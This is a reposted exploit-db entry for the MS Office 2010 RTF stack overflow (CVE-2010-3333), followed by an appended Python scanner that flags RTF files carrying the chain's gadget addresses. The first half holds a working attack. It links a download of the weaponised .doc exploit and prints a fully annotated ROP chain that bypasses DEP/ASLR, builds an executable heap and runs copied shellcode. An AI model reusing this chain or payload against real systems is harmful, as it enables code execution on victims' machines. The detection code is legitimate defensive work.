MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit

04 Jul 2011 00:00:00 | Reported by RootType | Source: seebug (www.seebug.org)

MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit by Snake

Code

# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit
# Date: 7/3/2011
# Author: Snake ( Shahriyar.j < at > gmail )
# Version: MS Office <= 2010
# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7
# CVE : CVE-2010-3333
 
# This is the exploit I wrote for the Abysssec "The Arashi" article.
# It gracefully bypasses DEP/ASLR in MS Office 2010,
# and we named this method "Ikazuchi DEP/ASLR Bypass" : >
# unfortunately msgr3en.dll loads a few seconds after opening Office,
# so you just need to open Office, then open the exploit after a few
# seconds and see a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
#              http://www.exploit-db.com/download_pdf/17469
 
# me : twitter.com/ponez
# also check here for Persian docs of this method and more :
# http://www.0days.ir/article/
 
Exploit:  http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc
 
 
#
# and the ROP chain :
 
0x3F2CB9E0    POP ECX
              RETN
        # HeapCreate() IAT = 0x3F10115C
 
0x3F389CA5    MOV EAX,DWORD PTR DS:[ECX]
              RETN
        # EAX == HeapCreate() Address
 
0x3F39AFCF    CALL EAX
              RETN
        # Call HeapCreate() and create an executable heap :D
        # after this call, EAX contains our heap address.
 
0x3F2CB9E0    POP ECX
              RETN
        # pop 0x00008000 into ECX
 
0x3F39CB46    ADD EAX,ECX
              POP ESI
              RETN
        # add ECX to EAX and, instead of calling HeapAlloc,
        # EAX now points into the RWX heap :D
 
0x3F2CB9E0    POP ECX
              RETN
        # pop 0x3F3B3DC0 into ECX, it is a writable address.
 
0x3F2233CC    MOV DWORD PTR DS:[ECX],EAX
              RETN
        # storing our RWX heap address into 0x3F3B3DC0 ( ECX ) for
        # further use ;)
 
0x3F2D59DF    POP EAX
              ADD DWORD PTR DS:[EAX],ESP
              RETN
        # pop 0x3F3B3DC4 into EAX , it is a writable address containing zero!
        # then we add ESP to that zero, which results in storing ESP into
        # that address,
        # we need the ESP address for copying the shellcode ( which is stored
        # on the stack ),
        # and we have to get it dynamically at run-time, now with my
        # tricky instruction, we have it!
 
 
0x3F2F18CC    POP EAX
              RETN
        # pop 0x3F3B3DC4 ( ESP address ) into EAX
 
 
0x3F2B745E    MOV ECX,DWORD PTR DS:[EAX]
              RETN
        # now ECX points near the stack offset.
 
0x3F39795E    POP EDX
              RETN
        # pop 0x00000024 into EDX
 
0x3F39CB44    ADD ECX,EDX
              ADD EAX,ECX
              POP ESI
              RETN
        # add 0x24 to ECX ( stack address )
 
0x3F398267    MOV EAX,ECX
              RETN
        # EAX = ECX ; )
 
0x3F3A16DE    MOV DWORD PTR DS:[ECX],EAX
              XOR EAX,EAX
              POP ESI
              RETN
        # mov EAX ( stack address + 24 = current ESP value ) into the
        # current stack location,
        # and then pop it into ESI ! now ESI points to where the shellcode
        # is stored on the stack :D
 
0x3F398267    MOV EAX,ECX
              RETN
        # EAX = ECX ; )
 
0x3F2CB9E0    POP ECX
              RETN
        # pop 0x3F3B3DC0 ( saved heap address ) into ECX
 
0x3F389CA5    MOV EAX,DWORD PTR DS:[ECX]
              RETN
        # now EAX points to our RWX heap
 
0x3F2B0A7C    XCHG EAX,EDI
              RETN 4
        # EDI = our RWX heap address
 
 
0x3F2CB9E0    POP ECX
              RETN
        # pop 0x3F3B3DC0 ( saved heap address ) into ECX
 
 
0x3F389CA5    MOV EAX,DWORD PTR DS:[ECX]
              RETN
        # now EAX points to our RWX heap
 
0x3F38BEFB    ADD AL,58
              RETN
        # just skip some junk ; )
 
0x3F2CB9E0    POP ECX
              RETN
        # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = copy length )
 
0x3F3441B4    REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
              POP EDI
              POP ESI
              RETN
        # copy shellcode from stack into RWX heap
 
 
0x3F39AFCF    CALL EAX
              RETN
        # KABOOM !!!
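The chain above is a fixed sequence of msgr3en.dll addresses, which makes it a usable detection signature for documents carrying this exact exploit. The following Python scanner is an added defender-side example, not part of the original post or the author's exploit: it decodes the long hex-digit runs in which RTF stores binary payloads, then looks for the gadget addresses and the scratch addresses quoted in the chain as little-endian dwords. The gadget table is copied from the chain; the RTF samples are constructed here for illustration (the `\objdata` destination, the 16-byte minimum hex run, and the three-distinct-gadgets threshold are this example's choices, not anything from the post).

```python
import re
import struct

# Gadget addresses exactly as listed in the chain above (msgr3en.dll,
# Office 2010 14.0.4734.1000 per the post). Any document that carries
# several of them as little-endian dwords very likely embeds this chain.
ROP_GADGETS = {
    0x3F2CB9E0: "POP ECX / RETN",
    0x3F389CA5: "MOV EAX,[ECX] / RETN",
    0x3F39AFCF: "CALL EAX / RETN",
    0x3F39CB46: "ADD EAX,ECX / POP ESI / RETN",
    0x3F2233CC: "MOV [ECX],EAX / RETN",
    0x3F2D59DF: "POP EAX / ADD [EAX],ESP / RETN",
    0x3F2F18CC: "POP EAX / RETN",
    0x3F2B745E: "MOV ECX,[EAX] / RETN",
    0x3F39795E: "POP EDX / RETN",
    0x3F39CB44: "ADD ECX,EDX / ADD EAX,ECX / POP ESI / RETN",
    0x3F398267: "MOV EAX,ECX / RETN",
    0x3F3A16DE: "MOV [ECX],EAX / XOR EAX,EAX / POP ESI / RETN",
    0x3F2B0A7C: "XCHG EAX,EDI / RETN 4",
    0x3F38BEFB: "ADD AL,58 / RETN",
    0x3F3441B4: "REP MOVSD / POP EDI / POP ESI / RETN",
}

# Fixed addresses the chain also depends on; reported, but not counted
# toward the verdict because they are data slots rather than gadgets.
ROP_CONSTANTS = {
    0x3F10115C: "HeapCreate() IAT entry",
    0x3F3B3DC0: "scratch slot for the heap address",
    0x3F3B3DC4: "scratch slot for ESP",
}

# RTF stores binary payloads as runs of hex digits; requiring at least
# 16 bytes keeps short control-word fragments such as "f1" from matching.
HEX_RUN = re.compile(r"(?:[0-9A-Fa-f]{2}){16,}")


def decode_hex_runs(rtf_text):
    """Return every long hex-digit run in an RTF document as bytes.

    Only CR/LF are removed before matching (writers wrap hex data across
    lines); spaces are kept so a control word ending in a hex letter such
    as 'objdata' cannot fuse with the data and shift the byte alignment.
    """
    joined = rtf_text.replace("\r", "").replace("\n", "")
    return [bytes.fromhex(m.group(0)) for m in HEX_RUN.finditer(joined)]


def find_chain_markers(blob):
    """Locate gadget and constant dwords (little-endian) inside a blob.

    Returns a sorted list of (offset, value, description).
    """
    hits = []
    for value, desc in list(ROP_GADGETS.items()) + list(ROP_CONSTANTS.items()):
        needle = struct.pack("<I", value)
        start = blob.find(needle)
        while start >= 0:
            hits.append((start, value, desc))
            start = blob.find(needle, start + 1)
    return sorted(hits)


def scan_rtf(rtf_text, min_distinct_gadgets=3):
    """Scan an RTF document for the chain; returns (suspicious, report).

    A single 4-byte match can be a coincidence in arbitrary binary data,
    so the verdict requires at least min_distinct_gadgets distinct gadget
    addresses inside one decoded hex run.
    """
    suspicious = False
    report = []
    for run_no, blob in enumerate(decode_hex_runs(rtf_text)):
        hits = find_chain_markers(blob)
        distinct = {v for _, v, _ in hits if v in ROP_GADGETS}
        if len(distinct) >= min_distinct_gadgets:
            suspicious = True
        report.append({"run": run_no, "size": len(blob),
                       "distinct_gadgets": len(distinct), "hits": hits})
    return suspicious, report


def build_sample_rtf():
    """Constructed sample (NOT the exploit document): an RTF skeleton whose
    \\objdata hex run carries the first four dwords of the chain, padded
    with filler and split across two lines as RTF writers often do."""
    chain = struct.pack("<IIII", 0x3F2CB9E0, 0x3F10115C, 0x3F389CA5, 0x3F39AFCF)
    payload = b"A" * 24 + chain + b"\x90" * 8
    hexdata = payload.hex()
    half = len(hexdata) // 2
    return ("{\\rtf1\\ansi\n{\\*\\objdata " + hexdata[:half] + "\n"
            + hexdata[half:] + "}\n}")


def build_benign_rtf():
    """Constructed benign document: a hex run with no chain markers."""
    return "{\\rtf1\\ansi\n{\\*\\objdata " + "41" * 40 + "}\n}"


if __name__ == "__main__":
    for name, doc in (("sample", build_sample_rtf()), ("benign", build_benign_rtf())):
        verdict, report = scan_rtf(doc)
        print(name, "suspicious =", verdict)
        for entry in report:
            for off, val, desc in entry["hits"]:
                print("  run %d @%#06x: %#010x %s" % (entry["run"], off, val, desc))
```

This signature is deliberately narrow: it catches documents that embed this chain's addresses for this msgr3en.dll build, not the underlying RTF parsing bug, so a re-encoded or differently built chain passes it. Treat it as one indicator alongside patch level (the fix for CVE-2010-3333) and generic document-exploit detection, and keep the distinct-gadget threshold above one so a lone dword match in legitimate embedded binary data does not raise an alert.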
 
